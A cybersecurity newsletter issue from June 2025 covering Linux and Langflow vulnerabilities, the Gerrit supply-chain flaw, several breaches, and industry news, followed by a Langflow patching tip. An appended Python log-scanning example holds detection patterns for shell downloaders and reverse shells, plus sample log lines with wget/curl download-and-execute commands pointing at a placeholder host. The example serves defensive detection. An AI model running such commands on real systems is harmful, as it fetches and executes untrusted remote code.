Cyber Briefing: 2025.06.18
Linux and Langflow flaws allow critical exploits, Google patches Gerrit. Breaches hit Scania, Nobitex, and Cock.li. CIA leaker sentenced, 23andMe fined $3M, Coralogix secures $115M for AI.
👉 What's trending in cybersecurity today?
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
🚨 Cyber Alerts
1. New Linux Flaws Allow Easy Root Access
Security researchers at Qualys have discovered two new interconnected vulnerabilities that allow a local attacker to chain exploits together and gain full root privileges on major Linux distributions. The attack begins by exploiting a PAM configuration flaw in SUSE systems (CVE-2025-6018) to elevate an attacker's status, which then enables the exploitation of a second, more widespread bug. This second flaw (CVE-2025-6019) exists in the ubiquitous libblockdev library and udisks daemon, which ships by default on nearly all Linux systems including Ubuntu, Debian, and Fedora. Given the exploit's simplicity and the widespread presence of the vulnerable components, organizations are urged to treat this as a critical risk and apply patches for both PAM and libblockdev without delay.
2. Langflow Flaw Delivers Flodrix DDoS Botnet
A new campaign is actively exploiting a critical vulnerability (CVE-2025-3248) in the AI application framework Langflow to deliver the Flodrix botnet malware to unpatched servers. Trend Micro researchers report that attackers are using a public proof-of-concept exploit to run downloader scripts on compromised Langflow instances, which then fetch and install the botnet. Once installed, the Flodrix botnet, an evolution of the LeetHozer family, communicates with command-and-control servers to launch encrypted DDoS attacks against various targets. This campaign follows a CISA warning about the active exploitation of this same Langflow flaw, highlighting the ongoing risk of unpatched software in development environments.
3. Google Fixes GerriScary Supply Chain Flaw
A critical supply chain vulnerability dubbed “GerriScary” was discovered in Google’s Gerrit code collaboration platform, which could have allowed attackers to inject malicious code into at least 18 major projects like ChromiumOS and Dart. The technique, found by a Tenable researcher, exploited a combination of default permissions, flawed "Copy Conditions" settings, and a race condition with automated bots to get unapproved code merged into trusted repositories. This vulnerability created a significant risk to the software supply chain, as it impacted foundational Google projects including its build system Bazel, the Dart programming language, and even the Gerrit platform itself. In response to the disclosure, Google swiftly patched its projects by reconfiguring permissions and approval settings, but researchers warn other organizations using Gerrit may still be vulnerable to similar misconfigurations.
💥 Cyber Incidents
4. Scania Insurance Data Stolen In Partner Hack
Swedish heavy vehicle manufacturer Scania has confirmed a cyberattack on its insurance and financial services division after a threat actor named "hensi" claimed to be selling stolen data online. According to Scania, the breach occurred on May 28-29 when an attacker used credentials stolen from an external IT partner via password stealer malware to access its insurance systems. The attacker downloaded sensitive documents related to insurance claims and then attempted to extort Scania employees by threatening to disclose the data before leaking samples. In response, Scania has taken the affected application offline, notified privacy authorities, and launched an investigation with external experts, stating the operational impact was limited.
5. Pro-Israel Group Claims $81M Nobitex Hack
The Iranian cryptocurrency exchange Nobitex was hacked for over $81 million, with on-chain investigators spotting suspicious outflows from its hot wallets to attacker-controlled "vanity addresses" containing political messages. A pro-Israel hacker group named “Gonjeshke Darande” claimed responsibility for the attack, accusing the exchange of being a tool for the Iranian regime to finance terror and evade international sanctions. Nobitex confirmed a breach affecting some of its hot wallets but assured users their assets are secure in cold storage and that all losses will be fully compensated. This cyberattack occurs amid a renewed military conflict between Israel and Iran, highlighting the potential for state-linked or patriotic hacking groups to use cyberattacks as a new front in geopolitical disputes.
6. Hacker Sells Data Of 1M Cock.li Users
The privacy-focused email hosting provider Cock.li has confirmed a data breach affecting over one million user records after a threat actor exploited its Roundcube webmail platform. The incident, which exposed email addresses and login timestamps but not passwords or email content, came to light after the attacker began selling the stolen databases online for one Bitcoin. Cock.li believes the data was stolen via an old SQL injection vulnerability in Roundcube and has since permanently removed the webmail software from its service. The company, which is popular in infosec communities but also with cybercriminals, has recommended all users who have logged in since 2016 to reset their passwords as a precaution.
📢 Cyber News
7. Ex-CIA Analyst Guilty Of Leaking US Secrets
Former U.S. Central Intelligence Agency analyst Asif William Rahman has been sentenced to 37 months in prison for unlawfully retaining and transmitting top secret National Defense Information. Arrested last November in Cambodia, Rahman pleaded guilty in January to taking classified documents, photographing them, and willfully sending them to several individuals without the necessary clearance. Some of the leaked documents, which reportedly related to Israel's plans to attack Iran, later began circulating online after being posted to a Telegram channel. To hide his actions, Rahman engaged in what the Justice Department called a "deletion campaign," wiping data from his computer and editing personal journal entries to conceal his opinions.
8. UK Fines 23andMe $3M For Major Data Breach
The UK’s Information Commissioner’s Office (ICO) has fined embattled genetic testing company 23andMe over $3 million for failing to protect customer data during a 2023 credential stuffing attack. The breach compromised sensitive information of seven million people worldwide, including 155,592 UK residents, after attackers used stolen credentials to access initial accounts and then scrape data from others via the "DNA Relatives" feature. Regulators found 23andMe broke data protection law by failing to require multi-factor authentication, not properly securing genetic data downloads, and missing several opportunities to detect the long-running attack. This fine was announced as a non-profit led by 23andMe's former CEO is set to acquire the now-bankrupt company, with regulators stating they will ensure privacy obligations continue under new ownership.
9. Coralogix Gets $115M To Boost Its AI Agent
Israeli data observability and security startup Coralogix has raised $115 million in a Series E funding round, reaching a pre-money valuation of over $1 billion. The company plans to use the funds to expand its engineering base in India and further develop its agentic AI companion, Olly, which helps companies understand complex system data. Led by NewView Capital, the investment will fuel Coralogix's go-to-market scaling in North America and EMEA as it competes with rivals like Datadog. The CEO stated the company aims to grow its annual recurring revenue to eight digits and pursue a U.S. IPO on the Nasdaq within three years.
📈 Cyber Stocks
As U.S. markets open on Wednesday, June 18, 2025, these pure‑play cybersecurity names are showing mostly positive momentum amid bullish analyst sentiment, strong earnings trends, and strategic growth signals:
Okta (OKTA): Trading at $98.67, down 0.64%. The stock is consolidating following a post‑earnings dip, but remains supported by solid Q1 financials and positive analyst outlooks.
Zscaler (ZS): Trading at $307.31, up 0.77%. Shares are rallying following analyst upgrades from Wells Fargo and Barclays, with targets rising to $385 and $348, respectively.
Fortinet (FTNT): Trading at $102.88, up 0.92%. Investor confidence remains as its firewall and network security offerings continue to deliver reliable revenue and margin performance.
CrowdStrike (CRWD): Trading at $492.03, up 2.62%. The stock surges to new highs after upbeat Q1 earnings, while analysts maintain bullish long-term expectations.
Palo Alto Networks (PANW): Trading at $202.05, up 1.97%. The stock is gaining as its next-gen and AI-driven security rollout gains traction across enterprise customers.
💡 Cyber Tip
If you're running Langflow, update it now!
Hackers are actively exploiting a critical flaw in Langflow (CVE-2025-3248) to install Flodrix, a powerful botnet that launches encrypted DDoS attacks. The flaw allows attackers to run code on exposed servers without any login, putting development environments at serious risk.
✅ What you should do:
Immediately update Langflow to the latest patched version to close the security hole.
Take any public-facing Langflow instances offline until patches are applied.
Check logs for unusual HTTP requests or shell script activity on your servers.
Monitor outbound traffic for links to known malicious IPs or the TOR network.
Apply firewalls and access controls to restrict who can reach your development tools.
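The log-check step above, as an added example that is not part of the briefing: it scans web-server access logs for requests into the Langflow HTTP API whose URL or logged request body carries download-and-execute indicators. The log line format (combined log with the request body appended in quotes), the indicator set, the `/api/` prefix for the Langflow API, and the sample log lines are all assumptions constructed for the example.

```python
"""Flag Langflow API requests whose URL or logged body carries shell-downloader
indicators. Added example for the checklist above; log format and indicators are assumptions."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Assumed: combined-log-style lines with the request body appended in quotes.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<body>.*)"$'
)
# Tokens typical of a download-and-execute stage (assumed indicator set, extend as needed).
SHELL_INDICATORS = re.compile(
    r'(?:wget|curl)\s+\S*https?://|\|\s*(?:ba)?sh\b|chmod\s+\+x|/tmp/\S+|/dev/tcp/',
    re.IGNORECASE,
)

def decode(text):
    """Undo repeated percent-encoding so obfuscated payloads are inspected as plain text."""
    prev = None
    while prev != text:
        prev, text = text, unquote_plus(text)
    return text

def scan(lines):
    """Return {source_ip: [(timestamp, path, matched_indicator), ...]} for suspicious requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # line does not fit the assumed format
        path, body = decode(m["path"]), decode(m["body"])
        if not path.startswith("/api/"):  # Langflow HTTP API assumed to live under /api/
            continue
        found = SHELL_INDICATORS.search(path + " " + body)
        if found:
            hits[m["ip"]].append((m["ts"], path, found.group(0)))
    return dict(hits)

# Constructed sample log lines: two benign API calls and two staged-download attempts.
SAMPLE_LOGS = [
    '10.0.0.5 - - [17/Jun/2025:09:12:01 +0000] "GET /api/v1/flows HTTP/1.1" 200 512 "-"',
    '10.0.0.5 - - [17/Jun/2025:09:12:07 +0000] "POST /api/v1/flows HTTP/1.1" 201 88 "{name: demo}"',
    '203.0.113.7 - - [17/Jun/2025:09:13:44 +0000] "POST /api/v1/example HTTP/1.1" 200 41 '
    '"wget http://203.0.113.9/x.sh -O /tmp/x.sh; chmod +x /tmp/x.sh; /tmp/x.sh"',
    '203.0.113.7 - - [17/Jun/2025:09:13:50 +0000] "POST /api/v1/%2565xample HTTP/1.1" 200 41 '
    '"curl%20http%3A%2F%2F203.0.113.9%2Fy.sh%7Csh"',
]
```

Feed `scan()` the lines of your proxy or Langflow access log; every source IP it returns is a host whose requests deserve a closer look, and the double-decoding step is what catches the percent-encoded variant in the last sample line.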
🔒 Why this matters:
A single unpatched Langflow server can be used to install malware that floods other systems with traffic. This not only helps criminals but can also get your infrastructure blacklisted or taken offline.
📚 Cyber Book
Multimedia Security 2: Biometrics, Video Surveillance and Multimedia Encryption - by William Puech
That concludes today’s briefing.
Copyright © 2025 CyberMaterial. All Rights Reserved.